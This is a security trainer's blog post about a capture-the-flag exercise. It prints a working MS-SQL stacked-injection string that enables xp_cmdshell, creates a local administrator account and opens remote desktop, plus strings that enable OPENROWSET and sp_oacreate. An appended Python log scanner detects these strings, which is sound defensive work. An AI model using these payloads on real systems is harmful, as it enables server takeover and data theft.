Author: chaptersinwebsecurity
I created a specialized training program for techies in Texas a couple of weeks ago.
Decided to focus on web application attacks and defense tactics.
The three-day training reached its summit with a friendly game of "capture-the-flag"
where the participants needed to locate a file containing 1000 fake credit cards on an internal
MS-SQL server and extract it somehow.
The rules were simple:
- Use HTTP requests only
- Hack your way via a given web site
- Bonus points for total administrative control of the server at the end of the compromise
The challenge was conquered within ~1 hour.
The shortest solution vector is illustrated below. It is a useful short vector
for anyone penetration-testing a web site with an MS-SQL database as the backend.
After finding an injectable text parameter, simply concatenating the following SQL commands:
'; EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE ; exec master..xp_cmdshell 'net user hacker 12345 /add'; exec master..xp_cmdshell 'net localgroup administrators hacker /add'; EXECUTE master.dbo.xp_regwrite N'HKEY_LOCAL_MACHINE',N'SYSTEM\CurrentControlSet\Control\Terminal Server',N'fDenyTSConnections',N'REG_DWORD',0;--
will achieve the following goals:
- Enable xp_cmdshell in case it is disabled (SQL Server 2005 disables it by default)
- Add a user named "hacker" with password "12345" on the target database server
- Add the "hacker" user to the local "administrators" group on the target database server
- Set the registry value that allows remote desktop access to the server
Try it at home kids, not on production machines ;-)
Feel free to email me for questions regarding the above attack string
How to enable 'OPENROWSET' support on SQL Server 2005:
;exec sp_configure "show advanced options", 1;RECONFIGURE;exec sp_configure "Ad Hoc Distributed Queries",1;RECONFIGURE;--
How to enable 'sp_oacreate' support on SQL Server 2005:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
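As an added defensive illustration (not part of the original post), the following Python script scans web access log lines for the stacked-query enabling pattern shown above: sp_configure toggling of xp_cmdshell, Ad Hoc Distributed Queries or Ole Automation Procedures, followed by calls to xp_cmdshell, xp_regwrite, sp_oacreate or OPENROWSET. The log lines, the /search.aspx path and the q parameter are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# sp_configure option names toggled by the strings in the post, and the procedures they unlock.
RISKY_OPTIONS = ("show advanced options", "xp_cmdshell",
                 "ad hoc distributed queries", "ole automation procedures")
RISKY_PROCS = ("xp_cmdshell", "xp_regwrite", "sp_oacreate", "openrowset")

def normalize(value):
    """Decode URL encoding twice (catches double-encoding evasion), squeeze whitespace, lowercase."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(value))).lower()

def classify(value):
    """Return findings for one parameter value; an empty list means nothing suspicious."""
    s = normalize(value)
    found = []
    for opt in RISKY_OPTIONS:
        # sp_configure '<opt>', 1 (either quote style) is the enabling step; RECONFIGURE follows
        if re.search(r"sp_configure\s*['\"]%s['\"]\s*,\s*1\b" % re.escape(opt), s):
            found.append("enable:" + opt)
    for proc in RISKY_PROCS:
        if re.search(r"\b%s\b" % proc, s):
            found.append("call:" + proc)
    if re.search(r";\s*exec(?:ute)?\b", s):  # statement terminator followed by EXEC
        found.append("stacked-exec")
    return found

def scan_access_log(lines):
    """Return [(line_no, param, findings)] for request lines carrying risky parameter values."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST)\s+(\S+)', line)  # request line in combined log format
        if not m:
            continue
        for param, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
            findings = classify(value)
            if findings:
                hits.append((n, param, findings))
    return hits

# Constructed sample lines (not from the post); the third carries the post's payload URL-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2009:10:00:00 +0000] "GET /search.aspx?q=widgets HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2009:10:00:01 +0000] "GET /search.aspx?q=O%27Reilly HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2009:10:00:02 +0000] "GET /search.aspx?q=%27%3B+EXEC+sp_configure+'
    '%27show+advanced+options%27%2C1%3B+RECONFIGURE%3B+EXEC+sp_configure+%27xp_cmdshell%27%2C1%3B+'
    'RECONFIGURE%3B+exec+master..xp_cmdshell+%27net+user+hacker+12345+%2Fadd%27%3B-- HTTP/1.1" 500 0',
]
```

Calling `scan_access_log(SAMPLE_LOG)` returns a single hit for the `q` parameter on line 3, listing both enabling steps, the xp_cmdshell call and the stacked EXEC; the apostrophe in line 2 is correctly ignored.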
